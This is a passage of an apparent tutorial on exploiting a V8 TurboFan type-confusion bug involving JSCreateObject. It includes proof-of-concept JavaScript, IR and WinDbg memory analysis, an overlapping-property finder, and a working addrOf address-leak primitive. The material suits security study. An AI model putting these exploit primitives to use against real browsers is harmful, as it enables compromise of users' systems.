Now that we have created our proof of concept, let’s start d8 with the --allow-naitives-syntax flag and add in our vuln function. Once the function is created, let’s execute the last 4 lines of code within our proof of concept. You should see the following output:

d8> vuln({a:42, b:43})
43
d8> vuln({a:42, b:43})
43
d8> %OptimizeFunctionOnNextCall(vuln)
undefined
d8> vuln({a:42, b:43})
0

And with that, we have working proof of concept! As you can see, the optimized function no longer returns 43, but returns 0 instead.

Before we delve further into the bug and try to achieve a working type-confusion, let’s run this script with the --trace-turbo flag and inspect the IR at each optimization stage to confirm that the CheckMap node has indeed been removed and that this is not a fluke.

C:\dev\v8\v8\out\x64.debug>d8 --allow-natives-syntax --trace-turbo poc.js
Concurrent recompilation has been disabled for tracing.
---------------------------------------------------
Begin compiling method vuln using Turbofan
---------------------------------------------------
Finished compiling method vuln using Turbofan

Once you have the turbo file created, let’s examine the Typer optimization phase to see the initial IR graph.

Initial review of the IR shows us what we expected. As you can see, the Parameter[1] node passes in the object for our function. This object goes through a CheckMaps operation to validate the map, and then a LoadField operation is called to return property a.

Next, we call JSCreateObject to modify our object into a prototype. Afterwards the IR goes through a CheckMaps operation to validate the Map of the object and then calls the LoadField operation to return property b. This is the expected side-effect flow that should have been preserved.

Now, let’s take a look at the IR after the lowering phase. Since CreateObject does not write to the side-effect chain, the CheckMaps node should no longer exist due to redundancy elimination.

As you can see in the simplified lowering phase, our previous CheckMaps node after the JSCreateObject call has now been removed and it directly calls the LoadField node.

Now that we have confirmed that JIT’d code does indeed remove the CheckMaps node, let’s modify our proof of concept to not use %OptimizeFunctionOnNextCall and instead put our code within a loop so that JIT will take over when it is executed.

Additionally, this time let’s add an out-of-line property to our object so that we can force JIT to access the backing store as an array, which will trigger our type confusion.

Our updated POC will look like so:

function vuln(obj) {
  // Access Property a of obj, forcing a CheckMap operation
  obj.a;

  // Force a Map Transition via our side-effect
  Object.create(obj)

  // Trigger our type-confusion by accessing an out-of-bound property
  return obj.b;
}

for (let i = 0; i < 10000; i++) {
  let obj = {a:42}; // Create object with in-line properties
  obj.b = 43; // Store property out-of-line in backing store
  vuln(obj); // Trigger type-confusion
}

After updating this code, and running it with the --trace-turbo flag, we can again confirm that we have a working type-confusion. As we can see in the IR, the compiler accesses our object’s backing store pointer at offset 8, and then loads property b which it thinks is at offset 16 in the array. However, it will access another region of data since it’s no longer an array but a dictionary.

Exploiting a Type Confusion for JSCreateObject

Now that we have a working type-confusion where V8 access a NamedDictionary as an array, we have to figure out how we can abuse this vulnerability to gain read and write access to V8’s heap.

Unlike many exploits, this vulnerability does not involve a memory corruption flaw, so it is not possible to overflow a buffer and control the instruction pointer (RIP). However, type confusion vulnerabilities do allow us to manipulate function pointers and data within the memory layout of an object. For instance, if we can overwrite the pointer to an object and V8 dereferences or jumps to that pointer, we can achieve code execution.

Unfortunately, we can’t just blindly start reading and writing data into objects without having some precision. As seen in the IR above, we do have some control over where V8 will go to read and write data by specifying a property in an array. However, due to the type confusion, this array is converted into a NameDictionary, which means the layout changes.

To exploit this vulnerability, we need to understand how these two object structures differ and how we can manipulate them to achieve our goals.

As we know from Part 1, an array is simply a FixedArray structure that stores property values one after the other and is accessed by index. As you can see in the IR above, the first LoadField call is at offset 8, which would be the properties backing store pointer within JSObject. Since we have only one out-of-line property in the backing store, we see the second LoadField access the first property at offset 16, initially skipping over the Map and Length.

During the conversion from an array to a dictionary, we also know that all the properties metadata information is no longer stored in the Descriptor Array in the Map but directly in the properties backing store. In this case, the dictionary stores property values inside a dynamically sized buffer of name, value, and detail triplets.

In essence, the NameDictionary structure is more complex than what we detailed in Part 1. To better understand the memory layout of a NameDictionary, I have provided a visual example below.

As you can see, the NameDictionary does store the property triplets as well as additional metadata related to the number of elements in the dictionary. In this case, if our type-confusion read the data at offset 16 like in the IR above, then it would have read the number of elements that are stored within the dictionary.

To validate this information, we can reuse our proof-of-concept script and set breakpoints in WinDbg to examine the memory layout of our objects. One simple way to debug these proof-of-concept scripts is to set a breakpoint on the RUNTIME_FUNCTION(Runtime_DebugPrint) function in the /src/runtime/runtime-test.cc source file. This will trigger when %DebugPrint is called, allowing us to get debug output from d8 and further analyze the exploit in WinDbg.

Let’s start by modifying the proof-of-concept by adding in the DebugPrint command before and after the object is changed. The script should look like this:

function vuln(obj) {
  // Access Property a of obj, forcing a CheckMap operation
  obj.a;

  // Force a Map Transition via our side-effect
  Object.create(obj)

  // Trigger our type-confusion by accessing an out-of-bound property
  return obj.b;
}

for (let i = 0; i < 10000; i++) {
  let obj = {a:42}; // Create object with in-line properties
  obj.b = 43; // Store property out-of-line in backing store
  if (i = 1) { %DebugPrint(obj); }
  vuln(obj); // Trigger type-confusion
  if (i = 9999) { %DebugPrint(obj); }
}

To help analyze the memory layout of our object, we modify the proof-of-concept script to print out the object information at two points: once at iteration 1 after setting up its properties, and again at iteration 9999 after JIT kicks in and modifies the object.

To debug this script, we can launch d8 within WinDbg using the --allow-natives-syntax flag, followed by the location of the proof-of-concept script. For example:

Once done, press Debug. This will launch d8 and will hit the first debugging breakpoint which is set by WinDbg.

(17f0.155c): Break instruction exception - code 80000003 (first chance)
ntdll!LdrpDoDebuggerBreak+0x30:
00007ffd`16220950 cc              int     3

Now we can search for our DebugPrint function in V8’s source code by using the x v8!*DebugPrint* command within WinDbg. You should get similar output as below.

0:000> x v8!*DebugPrint*
*** WARNING: Unable to verify checksum for C:\dev\v8\v8\out\x64.debug\v8.dll
00007ffc`dc035ba0 v8!v8::internal::Runtime_DebugPrint (int, class v8::internal::Object **, class v8::internal::Isolate *)
00007ffc`db99ef00 v8!v8::internal::ScopeIterator::DebugPrint (void)
00007ffc`dc035f40 v8!v8::internal::__RT_impl_Runtime_DebugPrint (class v8::internal::Arguments *, class v8::internal::Isolate *)

We’ll set a breakpoint on the v8!v8::internal::Runtime_DebugPrint function. You can do that by running the following command in WinDbg.

bp v8!v8::internal::Runtime_DebugPrint

Once that breakpoint is configured, press Go or type g in the command window and we should hit our DebugPrint breakpoint.

You may notice that, even though the breakpoint is hit, there is no output in d8. To remedy this, we can set a breakpoint on line 542 by clicking on it and pressing F9. Then, we can press Shift + F11 or β€œStep Out” to continue execution and see the debug output in d8.

DebugPrint: 000000C44E40DAD9: [JS_OBJECT_TYPE]
 - map: 0x02a66658c251 <Map(HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x00a318f04229 <Object map = 000002A6665822F1>
 - elements: 0x02c9f8782cf1 <FixedArray[0]> [HOLEY_ELEMENTS]
 - properties: 0x00c44e40db81 <PropertyArray[3]> {
    #a: 42 (data field 0)
    #b: 43 (data field 1) properties[0]
 }

Upon inspection of the output, we can see that our object has one inline property, and one out-of-line property which should be in the properties backing store at address 0x00c44e40db81. Let’s quickly peek into our object with WinDbg to verify that address.

0:000> dq 000000C44E40DAD9-1 L6
000000c4`4e40dad8  000002a6`6658c251 000000c4`4e40db81
000000c4`4e40dae8  000002c9`f8782cf1 0000002a`00000000
000000c4`4e40daf8  000002c9`f8782341 00000005`00000000

Right away, we notice something different. While the object structure matches the address within the debug output, we notice that these are full 32bit addresses. The reason for this is because in this version of V8, pointer compression wasn’t yet implemented, so V8 still uses full 32bit address. As a result, values stored in the object structure are no longer doubled. This can be confirmed by verifying that the hex value of 0x2a is actually 42, which is the value of the first inline property.

Knowing this, let’s validate our properties array backing store structure by inspecting its memory content in WinDbg.

0:000> dq 0x00c44e40db81-1 L6
000000c4`4e40db80  000002c9`f8783899 00000003`00000000
000000c4`4e40db90  0000002b`00000000 000002c9`f87825a1
000000c4`4e40dba0  000002c9`f87825a1 deadbeed`beadbeef

Upon doing so, we see that the b property (with a value of 43 or 0x2b in hex) is at offset 16 of the array in the property backing store.

Now that we have validate our object structure, let’s press Go and then Shift + F12, to get the output of our modified object after triggering the bug.

DebugPrint: 000000C44E40DAD9: [JS_OBJECT_TYPE]
 - map: 0x02a66658c2f1 <Map(HOLEY_ELEMENTS)> [DictionaryProperties]
 - prototype: 0x00a318f04229 <Object map = 000002A6665822F1>
 - elements: 0x02c9f8782cf1 <FixedArray[0]> [HOLEY_ELEMENTS]
 - properties: 0x00c44e40dba9 <NameDictionary[29]> {
   #a: 42 (data, dict_index: 1, attrs: [WEC])
   #b: 43 (data, dict_index: 2, attrs: [WEC])
 }

After triggering the bug, we can see that the object’s map has changed and the property store has been converted to a NamedDictionary of size 29. We can confirm that the property store backing address is now at 0x00c44e40dba9 by checking the object structure in WinDbg.

0:000> dq 000000C44E40DAD9-1 L6
000000c4`4e40dad8  000002a6`6658c2f1 000000c4`4e40dba9
000000c4`4e40dae8  000002c9`f8782cf1 00000000`00000000
000000c4`4e40daf8  000002c9`f8782341 00000005`00000000

And it is! With that, let’s look into our dictionary structure at address 0x00c44e40dba9.

0:000> dq 0x00c44e40dba9-1 L12
000000c4`4e40dba8  000002c9`f8783669 0000001d`00000000
000000c4`4e40dbb8  00000002`00000000 00000000`00000000
000000c4`4e40dbc8  00000008`00000000 00000003`00000000
000000c4`4e40dbd8  00000000`00000000 000002c9`f87825a1
000000c4`4e40dbe8  000002c9`f87825a1 000002c9`f87825a1
000000c4`4e40dbf8  000000a3`18f22049 0000002a`00000000
000000c4`4e40dc08  000001c0`00000000 000002c9`f87825a1
000000c4`4e40dc18  000002c9`f87825a1 000002c9`f87825a1
000000c4`4e40dc28  000002c9`f87825a1 000002c9`f87825a1

Upon inspecting the dictionary structure at this address, we can see that it is significantly different from the FixedArray object structure. Additionally, we see that the value of the first property a (42 or 0x2a) is at offset 88 within this structure, and the value of the second property b (43 or 0x2b) is not present at the expected location. It’s likely that this value is located further within the dictionary’s memory layout.

Now you might be asking yourself, what are these odd values such as 000002c9f87825a1 within the dictionary structure? Well, a dictionary is actually a HashMap that uses hash tables to map a property’s key to a location in the hash table. The odd value that you are seeing is aΒ hash code, which is the result of applying a hash function to a given key.

At the top of the dictionary, we can see that the Map of the object is at offset 0, the length of the dictionary (29 or 0x1d in hex) is at offset 8, and the number of elements within the dictionary (2) is at offset 16.

In our case, when we access the b property, V8 will access the number of elements in the dictionary (which should be 2, as confirmed by the IR). Upon running this code in d8 after triggering the bug, it does indeed return 2.

d8> %OptimizeFunctionOnNextCall(vuln)
d8> let obj = {a:42}; obj.b = 43; vuln(obj);
2

Perfect! We just confirmed that our type confusion works and that we have some control over what type of data we can access in the dictionary by specifying a property. This will allow us to traverse the dictionary by 8 bytes for each property.

Now, let’s go back to our conversation about having precision when trying to read and write data to an object. As you can see, with two properties, we can only read the number of elements within the dictionary. This doesn’t really provide us much benefit because usually we don’t have much control over this part of the structure as it’s dynamically allocated.

What we want to do, is to gain read and write access to a properties value within the dictionary, since we can easily read and write data to the property value by just specifying the properties index.

As we’ve already seen, our first property value while at offset 16 in the array, is at offset 88 in the dictionary. As such, if we were to add 88/8=11 different properties, we should be able to read and write to our first property within the dictionary by accessing property 10 from the backing store (which should be 88 bytes, or 10x8+8, into the array).

This means that for every N properties in the FixedArray, we will have a handful of overlapping properties within the dictionary that are at the same offset.

To help you visualize this, below is an example of a memory dump of a FixrdArray with 11 properties and a NameDictionary that has an overlapping property.

   FixedArray                   NameDictionary
000002c9`f8783899             000002c9`f8783669 
0000000E`00000000             0000013F`00000000
00000001`00000000             0000000B`00000000
00000002`00000000             00000000`00000000
00000003`00000000             00000008`00000000 
00000004`00000000             00000003`00000000
00000005`00000000             00000000`00000000
00000006`00000000             000002c9`f87825a1
00000007`00000000             000002c9`f87825a1
00000008`00000000             000002c9`f87825a1
00000009`00000000             000000a3`18f22049
0000000A`00000000   <--!-->   00000001`00000000
0000000B`00000000             000001c0`00000000

As presented in the memory dump, we can see that by accessing property 10 from the FixedArray, we are able to access the value of property 1 after triggering the bug and converting the FixedArray to a NameDictionary. This in essence would allow us to read and write to property 1’s value in the dictionary.

However, there is a problem with this approach: the layout of the NameDictionary will be different in every execution of the engine due to the process-wide randomness used in the hashing mechanism for hash map tables. This can be verified by rerunning the proof of concept and inspecting the dictionary structure after triggering the bug. Your results will vary, but in my case, I had the following output:

0:000> dq 0x025e3e88dba9-1 L12
0000025e`3e88dba8  0000028d`cdf03669 0000001d`00000000
0000025e`3e88dbb8  00000002`00000000 00000000`00000000
0000025e`3e88dbc8  00000008`00000000 00000003`00000000
0000025e`3e88dbd8  00000000`00000000 00000305`8f922061
0000025e`3e88dbe8  0000002b`00000000 000002c0`00000000
0000025e`3e88dbf8  0000028d`cdf025a1 0000028d`cdf025a1
0000025e`3e88dc08  0000028d`cdf025a1 0000028d`cdf025a1
0000025e`3e88dc18  0000028d`cdf025a1 0000028d`cdf025a1
0000025e`3e88dc28  0000028d`cdf025a1 0000028d`cdf025a1

As we can see, property b (with a value of 43 or 0x2b) is now at offset 64 in the dictionary, and property a is not present at the expected location. In this case, property a was actually at offset 184. This means that our previous example of using 11 properties would not work.

Although the properties are not in a known or even guessable order, we still know that there likely exists a pair of properties P1 and P2 that will eventually overlap at the same offset. If we can write a JavaScript function to find these overlapping properties, we will at least be able to gain some precision in reading and writing new values to our properties.

Before writing this function, we need to consider how many properties we should generate in order to find this overlap. Well, due to in-object slack tracking the optimal number of fast properties is 32, so we will use that as our maximum.

Let’s start by repurposing our proof of concept by creating a new function that creates an object with one inline and 32 out-of-line properties. The code for this function is as follows:

function makeObj() {
    let obj = {inline: 1234};
    for (let i = 1; i < 32; i++) {
        Object.defineProperty(obj, 'p' + i, {
            writable: true,
            value: -i
        });
    }
    return obj;
}

One thing to note within the function is that we are using a negative value for i. The reason for this is that there are a few unrelated small positive values in the dictionary, such as the length and number of elements. If we use positive values for our property values, there is a risk of getting false positives when searching for overlapping properties. Therefore, we use negative numbers to distinguish our properties from these unrelated values.

From here we can start writing our function that will search for overlapped properties. One modification we will make is to our vuln function, which previously triggered the bug and returned property b of the object. In this case, we want to return the values of all properties so that we can compare them between the array and dictionary.

To do this, we can use the eval function with template literals to generate all the return statements at runtime with just a few lines of code. The following code allows us to do that:

function findOverlappingProperties() {
    // Create an array of all 32 property names such as p1..p32
    let pNames = [];
    for (let i = 0; i < 32; i++) {
        pNames[i] = 'p' + i;
    }

    // Create eval of function that will generate code during runtime
    eval(`
    function vuln(obj) {
      obj.inline;
      Object.create(obj);
      ${pNames.map((p) => `let ${p} = obj.${p};`).join('\n')}
      return [${pNames.join(', ')}];
    }
  `)
}

If you are confused about the last two lines in the eval function, here is a brief explanation. We are using template literals (backticks) and placeholders within the template, which are embedded expressions delimited by a dollar sign and curly braces: ${expression}. When we call the vuln function at runtime, these expressions undergo string interpolation and the expression will be replaced with a generated string.

In our case we are using the map function on the pNames array to create a new array of strings that will equate to let p1 = obj.p1. This allows us to generate these lines of code to set and return the values of all properties during runtime, instead of hardcoding everything.

An example of the output after the eval function can be seen in d8, like so:

d8> let pNames = []; for (let i = 0; i < 32; i++) {pNames[i] = 'p' + i;}
"p31"
d8> pNames
["p0", "p1", "p2", "p3", "p4", "p5", "p6", "p7", "p8", "p9", "p10", "p11", "p12", "p13", "p14", "p15", "p16", "p17", "p18", "p19", "p20", "p21", "p22", "p23", "p24", "p25", "p26", "p27", "p28", "p29", "p30", "p31"]
d8> pNames.map((p) => `let ${p} = obj.${p};`).join('\n')
let p0 = obj.p0;
let p1 = obj.p1;
let p2 = obj.p2;
let p3 = obj.p3;
let p4 = obj.p4;
let p5 = obj.p5;
...

Now that we have this code and understand how it works, we can update our proof of concept script to include these new functions, trigger the bug, and then print the values for both the array and dictionary. Our updated script will now look like so:

// Create object with one line and 32 out-of-line properties
function makeObj() {
    let obj = {inline: 1234};
    for (let i = 1; i < 32; i++) {
        Object.defineProperty(obj, 'p' + i, {
            writable: true,
            value: -i
        });
    }
    return obj;
}

// Find a pair of properties where p1 is stored at the same offset
// in the FixedArray as p2 is in the NameDictionary
function findOverlappingProperties() {
    // Create an array of all 32 property names such as p1..p32
    let pNames = [];
    for (let i = 0; i < 32; i++) {
        pNames[i] = 'p' + i;
    }

    // Create eval of our vuln function that will generate code during runtime
    eval(`
    function vuln(obj) {
      // Access Property inline of obj, forcing a CheckMap operation
      obj.inline;
      // Force a Map Transition via our side-effect
      this.Object.create(obj);
      // Trigger our type-confusion by accessing out-of-bound properties
      ${pNames.map((p) => `let ${p} = obj.${p};`).join('\n')}
      return [${pNames.join(', ')}];
    }
  `)

    // JIT code to trigger vuln
    for (let i = 0; i < 10000; i++) {
        let res = vuln(makeObj());
        // Print FixedArray when i=1 and Dictionary when i=9999
        if (i == 1 || i == 9999) {
            print(res);
        }
    }
}

print("[+] Finding Overlapping Properties");
findOverlappingProperties();

When we run the updated script in d8, we should get results which are similar the following:

C:\dev\v8\v8\out\x64.debug>d8 C:\Users\User\Desktop\poc.js
[+] Finding Overlapping Properties
,-1,-2,-3,-4,-5,-6,-7,-8,-9,-10,-11,-12,-13,-14,-15,-16,-17,-18,-19,-20,-21,-22,-23,-24,-25,-26,-27,-28,-29,-30,-31
,32,0,64,33,0,,,,p13,-13,3824,,,,p17,-17,4848,inline,1234,448,,,,p29,-29,7920,,,,p19,-19

Great! Our type-confusion works and we are able to leak data from the dictionary. From the output, we can see that we have a few overlapping properties, such as p10 overlapping with p13 (note the negative values).

Now that we have confirmed that this code works and we have overlapping properties, we can modify the script to enumerate through the results and choose an overlapping property whose value is less than 0 and greater than -32. Also, let’s remove properties that overlap themselves.

The updated code will look like the following:

// Function that creates an object with one in-line and 32 out-of-line properties
function makeObj() {
    let obj = {inline: 1234};
    for (let i = 1; i < 32; i++) {
        Object.defineProperty(obj, 'p' + i, {
            writable: true,
            value: -i
        });
    }
    return obj;
}

// Function that finds a pair of properties where p1 is stored at the same offset
// in the FixedArray as p2 in the NameDictionary
let p1, p2;

function findOverlappingProperties() {
    // Create an array of all 32 property names such as p1..p32
    let pNames = [];
    for (let i = 0; i < 32; i++) {
        pNames[i] = 'p' + i;
    }

    // Create eval of our vuln function that will generate code during runtime
    eval(`
    function vuln(obj) {
      // Access Property inline of obj, forcing a CheckMap operation
      obj.inline;
      // Force a Map Transition via our side-effect
      this.Object.create(obj);
      // Trigger our type-confusion by accessing out-of-bound properties
      ${pNames.map((p) => `let ${p} = obj.${p};`).join('\n')}
      return [${pNames.join(', ')}];
    }
  `)

    // JIT code to trigger vuln
    for (let i = 0; i < 10000; i++) {
        // Create Object and pass it to Vuln function
        let res = vuln(makeObj());
        // Look for overlapping properties in results
        for (let i = 1; i < res.length; i++) {
            // If i is not the same value, and res[i] is between -32 and 0, it overlaps
            if (i !== -res[i] && res[i] < 0 && res[i] > -32) {
                [p1, p2] = [i, -res[i]];
                return;
            }
        }
    }
    throw "[!] Failed to find overlapping properties";
}

print("[+] Finding Overlapping Properties...");
findOverlappingProperties();
print(`[+] Properties p${p1} and p${p2} overlap!`);

If we run the updated code in d8 again, we will see that we are able to consistently find overlapping properties.

C:\dev\v8\v8\out\x64.debug>d8 C:\Users\User\Desktop\poc.js
[+] Finding Overlapping Properties...
[+] Properties p7 and p12 overlap!

Understanding Browser Exploit Primitives

Alright, so we’re able to exploit our bug to trigger a type-confusion and discovered overlapping properties that we can utilize to read and write data to. To those with a keen eye, you might have noticed that currently we only can read SMI’s and strings. In essence, just reading integers or strings is useless, we need to find a way to read and write memory pointers.

To help us accomplish that, we need to construct a read and write exploit primitive known as the addrOf and fakeObj primitive, respectively. These primitives will allow us to exploit our overlapping properties by confusing an object of one type with an object of another type

To build these primitives, we can abuse our current type-confusion and the way Maps work with redundancy elimination in JIT to construct our own global type confusion for any arbitrary value of our choosing!

If you remember back in Part 1 and Part 2, we discussed Maps and the BinaryOp along with the Feedback Lattice. As we know, Maps store type information for properties and the BinaryOp stores the potential type states of properties during JIT compilation.

For example, let’s take the following code:

function test(obj) {
  return obj.b.x;
}

let obj = {};
obj.a = 13;
obj.b = {x: 14};

After this code is executed in V8, the Map of obj will show that it has a property a that is an SMI and a property b that is an object with a property x that is also an SMI.

If we force this function to be JIT’d, then the Map check for b will be omitted, since speculative assumptions will be made to assume that property b will always be an object with a specific Map, allowing redundancy elimination to remove the check. If this type information is invalidated, such as when a property is added or the value is modified to be a double, then a new Map will be allocated and the BinaryOp will be updated to include type information for both an SMI and Double.

With this in mind, it becomes possible to abuse this scenario along with our overlapping properties to construct a powerful exploit primitive that will be the foundation for out read and write primitives.

An example of this code that will be used as our base for the primitives can be seen below with comments.

eval(`
  function vuln(obj) {
    // Access Property inline of obj, forcing a CheckMap operation
    obj.inline;
    // Force a Map Transition via our side-effect
    this.Object.create(obj);
    // Trigger our type-confusion by accessing an out-of-bound property.
      // This will load p1 from our object thinking it's ObjX, but instead
      // due to our bug and overlapping properties, it loads p2 which is ObjY
    let p = obj.${p1}.x;
    return p;
  }
`)

let obj = makeObj();
obj[p1] = {x: ObjX};
obj[p2] = {y: ObjY};
vuln(obj)

As you can see, p1 and p2 are our overlapping properties after our array is converted to a dictionary. By setting p1 as Object X and p2 as Object Y, when we JIT compile the vuln function, the compiler will assume that our variable p will be of type Object X due to the Map of obj omitting the type checks.

However, due to the initial type-confusion vulnerability we are exploiting, the code will actually read property p2 and receive Object Y. In this case, the engine will then represent Object Y as Object X, causing another type confusion.

By using this global type confusion that we constructed, we can now create our read and write primitives to leak object addresses and to write to arbitrary object fields.

The addrOf Read Primitive

The addrOf primitive stands for β€œAddress Of” and it does exactly what it says. It allows us to leak the address pointer of a specific object by abusing our constructed type-confusion.

As demonstrated in the example above, we can create a global type confusion by abusing our overlapping properties and the way Maps store type information, allowing us to represent the output of Object Y as Object X.

So, the question is, how do we abuse this scenario to leak a memory address?

We can’t simply pass in two objects and return an object because they are the same shape. If we do this, V8 will simply dereference the object and either return the object type, or the object’s properties.

An example of what we would see is shown below:

C:\dev\v8\v8\out\x64.debug>d8 --allow-natives-syntax C:\Users\User\Desktop\poc.js
[+] Finding Overlapping Properties...
[+] Properties p24 and p21 overlap!
[+] Leaking Object Address...
[+] Object Address: [object Object]

As you can see, the return value of [object Object] isn’t useful for us. Instead, we need to return the object but as a different type.

In this case, we can create a type-confusion read primitive by making Object X a Double! This way, when we call p1, it will expect a double value, and since p1 actually returns p2 (which is an object pointer) instead of dereferencing the pointer, it will return it to us as a double floating-point number!

Let’s see this in action. Using the example code from earlier, we can modify it to create an addrOf function by changing Object X to a double and leaving Object Y as an object.

The function will look like so:

function addrOf() {
    eval(`
    function vuln(obj) {
      obj.inline;
      this.Object.create(obj);
      return obj.p${p1}.x;
    }
  `);

    let obj = makeObj()
    obj[p1] = {x: 13.37};
    obj[p2] = {y: obj};
    vuln(obj); // Returns Address of obj as Double
}

As you can see, we set p1 as a double with the value of 13.37 and we set Object Y as the object that gets created from our makeObj function.

After triggering the vulnerability through the vuln function, the engine will assume that the value returned to us by obj.p1.x will be a double, but instead it will load the pointer to our p2 object and return it as a double.

This way we should be able to leak our objects address, but we have one slight problem with the makeObj function. Currently the makeObj function creates our object with one in-line and 32 out-of-line properties.

As you may recall, those 32 out-of-line properties are all negative numbers which we used to avoid false positives when finding overlapping properties. While this isn’t an issue, the bigger problem is that after we find the overlapping properties, we need to be able to modify those specific property indexes within our array’s backing store so that when the dictionary conversion occurs, we can exploit our type confusion with precision.

Currently, that’s not possible for reasons explained below.

After our object is created, if we try to modify its properties at a specific index, it will either be added to the start or to the end of the properties array. Additionally, we can’t simply modify a named property via its pN name as it’s not defined.

An example of this can be shown below.

d8> let obj = {p1:1, p2:2, p3:3};
d8> obj[12] = 12;
d8> obj
{12: 12, p1: 1, p2: 2, p3: 3}
d8> obj[p3] = 12
(d8):1: ReferenceError: p3 is not defined
obj[p3] = 12
    ^

To accurately set our objects where we need them, we need to create an array of properties that will be passed to our object during creation. This way, by using the index from p1 and p2, we can create a holey array of properties that will allow us to precisely set our objects.

An example of this can be seen below:

d8> let obj = [];
d8> obj[7] = 7;
d8> obj[12] = 12;
d8> obj
[, , , , , , , 7, , , , , 12]

To do this, let’s modify our makeObj function to take in an array of pValues as properties and have pValues[i] set as the value, like this:

// Function that creates an object with one in-line and 32 out-of-line properties
function makeObj(pValues) {
    let obj = {inline: 1234};
    for (let i = 0; i < 32; i++) {
        Object.defineProperty(obj, 'p' + i, {
            writable: true,
            value: pValues[i]
        });
    }
    return obj;
}

With this in place, we can now modify our addrOf function. We’ll start by adding a new pValues array and then setting p1 in the array to be an object with a double value and p2 to be a custom-created object.

function addrOf() {
    eval(`
    function vuln(obj) {
      obj.inline;
      this.Object.create(obj);
      return obj.p${p1}.x;
    }
  `);

    let obj = {z: 1234};
    let pValues = [];
    pValues[p1] = {x: 13.37};
    pValues[p2] = {y: obj};

    for (let i = 0; i < 10000; i++) {
        let res = vuln(makeObj(pValues));
        if (res != 13.37) {
            %DebugPrint(obj);
            return res;
        }
    }
}

As you can see, our JIT loop will call makeObj to create an object with our p1 and p2 properties, and then pass that to our vuln function to trigger the type confusion. The if statement is checking to see if the results returned by the vuln function don’t equal 13.37. If it doesn’t, it means we successfully triggered our type confusion and have read the address pointer of obj.

Since we are testing this, I have also added a %DebugPrint statement to print out the address of obj. This allows us to validate that the data returned is, in fact, our address.

Our exploit script will now look like so. Note, that in this test case, I simply added a call to addrOf which will exploit our overlapped properties to leak the object address that is hardcoded within the function.

Also, take note that I have modified our findOverlappingProperties function to include a pValues array for our negative numbers. This was done to support the modification we made to our makeObj function.

// Function that creates an object with one in-line and 32 out-of-line properties
function makeObj(pValues) {
    let obj = {inline: 1234};
    for (let i = 0; i < 32; i++) {
        Object.defineProperty(obj, 'p' + i, {
            writable: true,
            value: pValues[i]
        });
    }
    return obj;
}
// Function that finds a pair of properties where p1 is stored at the same offset
// in the FixedArray as p2 in the NameDictionary
let p1, p2;

function findOverlappingProperties() {
    // Create an array of all 32 property names such as p1..p32
    let pNames = [];
    for (let i = 0; i < 32; i++) {
        pNames[i] = 'p' + i;
    }

    // Create eval of our vuln function that will generate code during runtime
    eval(`
    function vuln(obj) {
      // Access Property inline of obj, forcing a CheckMap operation
      obj.inline;
      // Force a Map Transition via our side-effect
      this.Object.create(obj);
      // Trigger our type-confusion by accessing out-of-bound properties
      ${pNames.map((p) => `let ${p} = obj.${p};`).join('\n')}
      return [${pNames.join(', ')}];
    }
  `)

    // Create an array of negative values from -1 to -32 to be used
    // for out makeObj function
    let pValues = [];
    for (let i = 1; i < 32; i++) {
        pValues[i] = -i;
    }

    // JIT code to trigger vuln
    for (let i = 0; i < 10000; i++) {
        // Create Object and pass it to Vuln function
        let res = vuln(makeObj(pValues));
        // Look for overlapping properties in results
        for (let i = 1; i < res.length; i++) {
            // If i is not the same value, and res[i] is between -32 and 0, it overlaps
            if (i !== -res[i] && res[i] < 0 && res[i] > -32) {
                [p1, p2] = [i, -res[i]];
                return;
            }
        }
    }
    throw "[!] Failed to find overlapping properties";
}

function addrOf() {
    eval(`
    function vuln(obj) {
      obj.inline;
      this.Object.create(obj);
      // Trigger our type-confusion by accessing an out-of-bound property
        // This will load p1 from our object thinking it's a Double, but instead
        // due to overlap, it will load p2 which is an Object
      return obj.p${p1}.x;
    }
  `);

    let obj = {z: 1234};
    let pValues = [];
    pValues[p1] = {x: 13.37};
    pValues[p2] = {y: obj};

    for (let i = 0; i < 10000; i++) {
        let res = vuln(makeObj(pValues));
        if (res != 13.37) {
            %DebugPrint(obj);
            return res;
        }
    }
    throw "[!] AddrOf Primitive Failed"
}

print("[+] Finding Overlapping Properties...");
findOverlappingProperties();
print(`[+] Properties p${p1} and p${p2} overlap!`);
let x = addrOf();
print("[+] Leaking Object Address...");
print(`[+] Object Address: ${x}`);

With that, we can now execute the updated script in d8, and should get output similar to the following:

C:\dev\v8\v8\out\x64.debug>d8 --allow-natives-syntax C:\Users\User\Desktop\poc.js
[+] Finding Overlapping Properties...
[+] Properties p6 and p7 overlap!
DebugPrint: 000001E72E81A369: [JS_OBJECT_TYPE] in OldSpace
 - map: 0x005245541631 <Map(HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x00bfad784229 <Object map = 00000052455022F1>
 - elements: 0x0308c8602cf1 <FixedArray[0]> [HOLEY_ELEMENTS]
 - properties: 0x0308c8602cf1 <FixedArray[0]> {
    #z: 1234 (data field 0)
 }
0000005245541631: [Map]
 - type: JS_OBJECT_TYPE
 - instance size: 32
 - inobject properties: 1
 - elements kind: HOLEY_ELEMENTS
 - unused property fields: 0
 - enum length: invalid
 - stable_map
 - back pointer: 0x00524550c201 <Map(HOLEY_ELEMENTS)>
 - prototype_validity cell: 0x0379e0b82201 <Cell value= 1>
 - instance descriptors (own) #1: 0x01e72e80f339 <DescriptorArray[5]>
 - layout descriptor: 0000000000000000
 - prototype: 0x00bfad784229 <Object map = 00000052455022F1>
 - constructor: 0x00bfad784261 <JSFunction Object (sfi = 00000379E0B8ED51)>
 - dependent code: 0x0308c8602391 <Other heap object (WEAK_FIXED_ARRAY_TYPE)>
 - construction counter: 0

[+] Leaking Object Address...
[+] Object Address: 1.033797443889e-311

As you can see, the addrOf function returned a double floating-point value! Now we need to convert this floating point to an actual address so we can validate its correctness.

To do that, we can use TypedArrays which allows us to describe an array-like view of an underlyingΒ binary data buffer. Since the data returned to us is a double precision floating point value, we can use the Float64Array to store our double in binary format like so:

d8> let floatView = new Float64Array(1);
d8> floatView[0] = 1.033797443889e-311

Once done, we can convert our floatView buffer to a 64-bit unsigned integer via the BigUint64Array, which should give us the byte representation of our object’s address.

d8> let uint64View = new BigUint64Array(floatView.buffer);
d8> uint64View[0]
2092429321065n

From here’s it’s as simple as using the toString function with base 16 to convert the bytes to hexadecimal, which should give us a valid address.

d8> uint64View[0].toString(16)
"1e72e81a369"

As shown, once we convert our bytes to hex, we see that the value leaked by our addrOf primitive matches our object’s address of of 000001E72E81A369!

We now have a working addrOf read primitive!

